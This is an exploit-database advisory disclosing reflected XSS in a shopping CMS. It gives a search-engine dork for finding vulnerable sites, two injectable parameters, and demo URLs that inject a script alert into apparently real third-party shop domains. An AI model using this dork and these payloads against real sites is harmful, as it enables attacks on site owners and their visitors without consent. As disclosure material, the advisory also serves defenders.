YSD Shoping CMS XSS Vulnerability

2013.09.15
Credit: Hossein Hezami ( Dr.3v1l )
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: inurl:\"/product_list.php?bid=\" , intext:\"Designed by YSD\"

######################################################################## # 1010101010101010101010101010101010101010101010101 # # 0 __ _ __ 0 # # 1 /'__`\ /' \/\ \ 1 # # 0 /\_\ \ \ __ __ /\_, \ \ \ 0 # # 1 \/_/_\_<_ /\ \ /\ \\/_/\ \ \ \ 1 # # 0 /\ \ \ \\ \ \_/ / \ \ \ \ \____ 0 # # 1 \ \____/ \ \___/ \ \_\ \_____\ 1 # # 0 \/___/ \/__/ \/_/\/_____/ 0 # # 1 1 # # 0 >> Dr.3v1l 0 # # 1 >> 0WebSecurity.IR 1 # # 0 0 # # 1 [+] E-Mail : B.Devils.B@gmail.com 1 # # 0 [+] Y! : Doctor.3v1l 0 # # 1 1 # # 0 ########################################### 0 # # 1 I'm 3v1l member from Black_Devils B0ys Team 1 # # 0 ########################################### 0 # # 1 1 # # 0101010101010101010101010101010101010101010101010 # ######################################################################## # # Exploit Title: YSD Shoping CMS XSS Vulnerability # Date: 2013 13 September # Author: Hossein Hezami ( Dr.3v1l ) # Software Link: www.ysd.hk # Version: All Version # Category: webapps # Google Keywords: inurl:"/product_list.php?bid=" , intext:"Designed by YSD" # Tested on: Windows , Linux # ######################################################################## # # [~] Exploit : # # http://<server>/search_result.php?search_key=[XSS] # http://<server>/product_list.php?bid=[XSS] # ######################################################################## # # [~] Demo : # # www.dmXaudio.com/search_result.php?search_key="><script>alert(/Hacked by Dr.3v1l/)</script> # www.Xom/search_result.php?search_key="><script>alert(/Hacked by Dr.3v1l/)</script> # # ---------- # www.Xaudio.com/product_list.php?bid=232"><script>alert(/Hacked by Dr.3v1l/)</script> # wwwXm/product_list.php?bid=252"><script>alert(/Hacked by Dr.3v1l/)</script> # www.shoXbaby.com.hk/product_list.php?bid=56"><script>alert(/Hacked by Dr.3v1l/)</script> # ######################################################################## # # [~] Note : # # This Is A Simple XSS Vulnerability # Found by Dr.3v1l # ######################################################################## # # [~] Contact Me : # # Teacher.3v1l@live.com # B.Devils.B@gmail.com # Twitter.com/Doctor_3v1l # IR.LinkedIN.com/in/Hossein3v1l # ########################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top